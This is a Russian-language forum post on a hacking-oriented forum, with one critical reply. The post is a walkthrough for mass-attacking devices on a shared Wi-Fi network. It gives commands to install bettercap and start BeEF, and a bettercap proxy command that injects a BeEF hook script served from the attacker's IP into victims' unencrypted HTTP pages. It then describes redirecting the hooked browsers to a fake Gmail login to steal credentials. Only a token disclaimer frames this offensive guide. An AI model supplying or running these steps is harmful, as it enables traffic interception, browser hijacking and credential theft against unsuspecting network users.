• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Массовый взлом любых устройств в сети

reDsox5

Участник
Сообщения
5
Реакции
12
0 руб.
Вся информация представлена в ознакомительных целях!


Всем привет! Сегодня расскажу как можно похакать любые устройства в вашей сетке, и сделать это массово.

Итак нам понадобится :

- Kali Linux
- beef-xss framework
- bettercap

Установим bettercap на Kali Linux:
Код:
apt install build-essential ruby-dev libpcap-dev net-tools

gem install bettercap


Beef в Kali уже установлен. Запускаем beef. Логин beef, пароль beef.
Код:
service beef-xss start


Если проблемы с авторизацией, запускаем из папки:
Код:
cd /usr/share/beef ./beef


Подключаемся к любой вай-фай сети. Работает и в локалке, но не суть.

Запускаем bettercap:
Код:
bettercap --proxy --proxy-module injects --js-url "http://192.168.57.128:3000/hook.js"


Указываем ваш ip. Почему не локалхост думаю понятно. Тут происходит инжект скрипта beef'а. Снифаем траффик, подстраиваемся под запрос, встраиваем скрипт и отправляем обратно тому кто сделал запрос.
Работает, если человек зашел на страницу без ssl, т.е по протоколу http. Как только он закроет страницу, связь с ним пропадает.

Все браузеры-зомби которые подцепил beef отобразятся в меню слева. Пока они онлайн, можно использовать различные модули и экплоиты на них. Beef содержит множество модулей. Вам остается только подобрать нужные для ваших векторов атак. Все зависит от браузера и то в каких контекстах безопасности он находится. Каждый контекст может обеспечивать набор уникальных векторов атак.
Например, можно направить пользователя на фейк gmail. Выбираем нужный модуль, жмем execute.
У пользователя-зомби произойдет редирект на фейк. Если он введет свой логин и пароль, то они отобразятся у нас в панели.

На этом все. Спасибо за внимание.
 
Последнее редактирование:

/.e7z

Резидент
Сообщения
179
Реакции
335
0 руб.
Jabber
Почему не локалхост думаю понятно. Тут происходит инжект скрипта beef'а. Снифаем траффик, подстраиваемся под запрос, встраиваем скрипт и отправляем обратно тому кто сделал запрос.

Все браузеры-зомби которые подцепил beef отобразятся в меню слева. Пока они онлайн, можно использовать различные модули и экплоиты на них. Beef содержит множество модулей. Вам остается только подобрать нужные для ваших векторов атак.

Спасибо конечно за труд. Я бы сказал, что новичкам могла быть полезна эта статья, но текст выше явно показывает, что обращение идет не к новичкам, а к людям, которые уже делали подобные вещи неоднократно.
В противном случае, откуда все это знать ?

Новичкам не хватает описания, фото демонстрации работы в современных реалиях.
Опытным этого просто мало, ввиду отсутствия углубленного описания материала, который они и так знают.

Не знаю, будут ли мои советы уместны, но выбери аудиторию. Если новички - подробнее, разжевывая все.
Если люди уже выше начального уровня знаний - то подробнее на подводные камни или необычные методы использования.

Увы, пока статья в плавающем состоянии, она могла бы быть такой:
Если хотите захукать чужой браузер - используйте Beef и Bettercap.
Что такое "захукать" "Beef" и "Bettercap" - найдете в гугле.

3/10 - чисто за оформление.​
 
Сверху Снизу